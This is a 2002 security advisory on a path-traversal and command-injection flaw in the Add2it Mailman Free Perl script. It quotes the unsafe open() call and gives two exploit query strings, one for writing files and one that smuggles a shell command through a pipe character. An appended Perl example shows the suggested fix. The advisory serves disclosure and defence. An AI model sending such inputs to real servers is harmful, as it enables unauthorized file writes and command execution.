From: b0iler _ (b0ilerhotmail.com)
Date: Wed Feb 13 2002 - 18:57:32 CST

    #!/exploit/by/b0iler
    #
    #Add2it Mailman Free V1.73
    #script url: http://www.add2it.com/scripts/mailman-free.shtml

    The problem is that the script does not filter input well:

    $command = $ENV{'QUERY_STRING'};
    ($list, $email) = split(/=/,$command);

    and then the script makes an open() call based on input from the user:

    open(LIST, "${path}data/lists/$list");

    There are also open()s with > and >> which use $list.
    The way to exploit this to write to a file would be:

    ../../../../file=datato.write

    or for command execution:

    ../../../../bin/command|=blahbleh.com

    This exploit is for the free version of Add2it Mailman, but the same
    vulnerability is probably valid for the paid for version.

    Fix: filter meta characters and .. and use < << > >> with open()

    Author was contacted on 1/30/02 and replied that day stating the problem
    would be fixed in the next release. Which should be out by the time of this
    posting, although I haven't gotten any word about its release yet.

    -http://b0iler.advknowledge.net
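
The fix suggested in the post (filter the list name, give open() an explicit mode), sketched as an added example; it is not code from Add2it Mailman or from the original poster. The helper names safe_list_name and open_list, the $lists_dir variable and the list called "news" are assumptions made for the illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Assumed layout: one file per list in a lists directory (constructed in a temp dir).
my $lists_dir = tempdir(CLEANUP => 1);
open(my $seed, '>', File::Spec->catfile($lists_dir, 'news')) or die "seed: $!";
print {$seed} "user\@example.com\n";
close($seed);

# Hypothetical helper: accept only a plain list name, otherwise return undef.
sub safe_list_name {
    my ($raw) = @_;
    return undef unless defined $raw;
    # Allowlist of letters, digits, _ and - rejects '/', '..', '|', '<', '>',
    # whitespace and NUL bytes in one step; \z stops a trailing newline.
    return $raw =~ /\A([A-Za-z0-9_-]{1,64})\z/ ? $1 : undef;
}

# Hypothetical helper: open a list for reading with an explicit mode.
sub open_list {
    my ($raw) = @_;
    my $name = safe_list_name($raw);
    return undef unless defined $name;
    my $file = File::Spec->catfile($lists_dir, $name);
    # Three-argument open: the mode is fixed to '<', so the file name is
    # never parsed for '>', '>>' or a trailing '|'.
    open(my $fh, '<', $file) or return undef;
    return $fh;
}

# Constructed query strings: one legitimate, two shaped like those in the post.
for my $query ('news=user@example.com',
               '../../../../file=datato.write',
               '../../../../bin/command|=blahbleh.com') {
    my ($list, $email) = split(/=/, $query, 2);
    my $fh = open_list($list);
    printf "%-40s %s\n", $query, $fh ? 'opened' : 'rejected';
    close($fh) if $fh;
}
```

The allowlist and the explicit mode are independent layers: either one alone stops the pipe case, but only the allowlist stops the directory traversal.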
